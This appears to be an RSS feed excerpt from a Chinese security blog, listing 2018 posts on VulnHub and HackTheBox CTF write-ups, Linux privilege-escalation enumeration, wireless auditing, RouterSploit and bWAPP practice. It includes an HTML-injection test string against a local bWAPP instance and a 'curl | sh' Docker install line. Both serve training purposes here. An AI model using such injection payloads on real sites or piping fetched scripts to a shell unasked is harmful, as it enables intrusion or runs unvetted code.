icekamsec@gmail.com (icekam) Fri, 09 Nov 2018 11:49:51 +0000 https://www.icekam.com/post/linux-right-information-collection-artifact-linenum/ 介绍 LinEnum将自动执行在本地Linux枚举和权限提升备忘单中记录的许多检查 。 它是一个非常基本的shell脚本，执行超过65次检查，从内 IceKam 提权 LinEnum 信息搜集 工具资源 https://www.icekam.com/post/wireless-network-audit-script-airgeddon/ Thu, 08 Nov 2018 19:01:30 +0000 icekamsec@gmail.com (icekam) Thu, 08 Nov 2018 19:01:30 +0000 https://www.icekam.com/post/wireless-network-audit-script-airgeddon/ 工具介绍 airgeddon是一个用于Linux系统的多用途bash脚本，用于审计无线网络。 我总结下就是能够更快更迅速的测试无线网络的安全。 以 IceKam 无线审计 wifi破解 无线攻击 工具资源 https://www.icekam.com/post/raven-1-vulnhub-ctf-penetration-test-record/ Thu, 08 Nov 2018 14:00:39 +0000 icekamsec@gmail.com (icekam) Thu, 08 Nov 2018 14:00:39 +0000 https://www.icekam.com/post/raven-1-vulnhub-ctf-penetration-test-record/ 介绍 Raven是一台初级/中级boot2root机器。有四个标志可供查找，两种预定的获取方式。 使用VMware构建并在Virtual Box上 IceKam CTF john nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/things-to-do-after-installing-kali-linux/ Thu, 08 Nov 2018 00:00:00 +0000 icekamsec@gmail.com (icekam) Thu, 08 Nov 2018 00:00:00 +0000 https://www.icekam.com/post/things-to-do-after-installing-kali-linux/ 介绍 Kali Linux是一个开源项目，由Offensive Security维护和资助，后者是世界级信息安全培训和渗透测试服务提供商。 这是我个人的初 Michael Henderson Kali 经验心得 https://www.icekam.com/post/made-a-navigation-website-for-the-security-industry/ Wed, 07 Nov 2018 12:55:14 +0000 icekamsec@gmail.com (icekam) Wed, 07 Nov 2018 12:55:14 +0000 https://www.icekam.com/post/made-a-navigation-website-for-the-security-industry/ 介绍 博客搭建起来了，chrome的书签越来越多，很难精准的找到自己想要的资源。 就想着做一个导航网站自己用，有基友建议开放出来大家一起完善，我 IceKam 工具资源 编程开发 https://www.icekam.com/post/game-of-thrones-ctf-1-vulnhub-ctf-penetration-test-record/ Mon, 05 Nov 2018 14:17:37 +0000 icekamsec@gmail.com (icekam) Mon, 05 Nov 2018 14:17:37 +0000 https://www.icekam.com/post/game-of-thrones-ctf-1-vulnhub-ctf-penetration-test-record/ 介绍 名称：Game of Thrones CTF: 1 日期发布：2017年9月8日 作者：OscarAkaElvis 系列：Game of Thrones CTF 地址：https://www.vu IceKam CTF 靶机 逆向 破解 VulnHub 渗透测试 https://www.icekam.com/post/rotating-fortress-1.0.1-vulnhub-ctf-drone-exercise-record/ Sun, 04 Nov 2018 08:39:35 +0000 icekamsec@gmail.com (icekam) Sun, 04 Nov 2018 08:39:35 +0000 https://www.icekam.com/post/rotating-fortress-1.0.1-vulnhub-ctf-drone-exercise-record/ 简介 名称：Rotating Fortress 1.0.1 日期：2018年7月30日 难度：中级/硬级 falg：七个 Rotating Fortress已经制作了几个月，并且具有独特的功能 IceKam CTF 逆向 破解 提权 VulnHub 渗透测试 https://www.icekam.com/post/kali-linux-connected-to-hackthebox/ Sat, 03 Nov 2018 19:48:28 +0000 icekamsec@gmail.com (icekam) Sat, 03 Nov 2018 19:48:28 +0000 https://www.icekam.com/post/kali-linux-connected-to-hackthebox/ 介绍 今天准备使用hackthebox练练手，发现由于在q内无法链接到0pVpn，弄了一会儿才解决。 方式 我们下载好连接文件后需要在配置文件中添 IceKam Kali hackthebox 经验心得 https://www.icekam.com/post/penetration-test-record-for-jerry-hackthebox-drone/ Sat, 03 Nov 2018 19:23:51 +0000 icekamsec@gmail.com (icekam) Sat, 03 Nov 2018 19:23:51 +0000 https://www.icekam.com/post/penetration-test-record-for-jerry-hackthebox-drone/ 介绍 最近连着几天练习VulnHub有点疲惫，就玩玩hackthebox吧，其实这个站的环境都挺难的，老外的思路一直如此怪异。 环境介绍 名称：J IceKam CTF 靶机 tomcat windows hackthebox 渗透测试 https://www.icekam.com/post/ch4inrulz-1.0.1-vulnhub-ctf-drone-exercise-record/ Fri, 02 Nov 2018 01:54:48 +0000 icekamsec@gmail.com (icekam) Fri, 02 Nov 2018 01:54:48 +0000 https://www.icekam.com/post/ch4inrulz-1.0.1-vulnhub-ctf-drone-exercise-record/ 环境介绍 VM名称：ch4inrulz: 1.0.1 发布日期：2018年7月31日 作者：askar 系列：ch4inrulz 说明： Frank拥有一个小型网 IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/wakanda-1-vulnhub-ctf-drone-exercise-record/ Thu, 01 Nov 2018 05:43:36 +0000 icekamsec@gmail.com (icekam) Thu, 01 Nov 2018 05:43:36 +0000 https://www.icekam.com/post/wakanda-1-vulnhub-ctf-drone-exercise-record/ 环境介绍： 名称：wakanda：1 日期：2018年8月5日 作者：xMagass 系列：wakanda 说明：一个新的Vibranium市场将很快 IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/routersploit-embedded-device-development-framework/ Wed, 31 Oct 2018 10:08:21 +0000 icekamsec@gmail.com (icekam) Wed, 31 Oct 2018 10:08:21 +0000 https://www.icekam.com/post/routersploit-embedded-device-development-framework/ 工具介绍 RouterSploit Framework 是一个专用于嵌入式设备的开源开发框架。 它由各种有助于渗透测试操作的模块组成： 漏洞 - 利用已识别漏洞的模块 creds - 用于测试网络服务凭证的 IceKam CTF 嵌入式 工控安全 路由器 工具资源 https://www.icekam.com/post/temple-of-doom-drone-exercise-record/ Tue, 30 Oct 2018 07:55:15 +0000 icekamsec@gmail.com (icekam) Tue, 30 Oct 2018 07:55:15 +0000 https://www.icekam.com/post/temple-of-doom-drone-exercise-record/ VM 名称：Temple of Doom: 1 难度：容易 / 中等 注意：2 种获取 root 的方法！ 下载地址：https://www.vulnhub.com/entry/te IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/bwapp-learning-record-a1-injection/ Sat, 27 Oct 2018 07:08:48 +0000 icekamsec@gmail.com (icekam) Sat, 27 Oct 2018 07:08:48 +0000 https://www.icekam.com/post/bwapp-learning-record-a1-injection/ 列表为翻译，方便记忆，原创作品，禁止转载。 HTML注入-反射（GET） 访问地址： 1 http://localhost:8088/htmli_get.php 在First name:和Last name: 输入： 1 <marquee><h2>Hello I'm IceKam!!</h2></marquee> and <img src="hacked.jpg"> 意 IceKam bWAPP 注射 web安全 https://www.icekam.com/post/installation-of-docker-under-kali-linux/ Sat, 27 Oct 2018 06:57:40 +0000 icekamsec@gmail.com (icekam) Sat, 27 Oct 2018 06:57:40 +0000 https://www.icekam.com/post/installation-of-docker-under-kali-linux/ 一键安装Docker 这是最快的方式。在未安装过Docker的机器上，root权限执行如下命令即可一键安装最新版Docker： 1 curl -s https://get.docker.com/ | sh 如果 IceKam Kali Docker 经验心得 https://www.icekam.com/post/introduction-of-penetration-testing-platform-bwapp-and-installation-under-docker/ Sat, 27 Oct 2018 06:30:13 +0000 icekamsec@gmail.com (icekam) Sat, 27 Oct 2018 06:30:13 +0000 https://www.icekam.com/post/introduction-of-penetration-testing-platform-bwapp-and-installation-under-docker/ bWAPP介绍 bWAPP，或者是一个有缺陷的Web应用程序，是一个免费的，开源的故意不安全的Web应用程序。 它可以帮助安全爱好者，开发人员和 IceKam Docker bWAPP web安全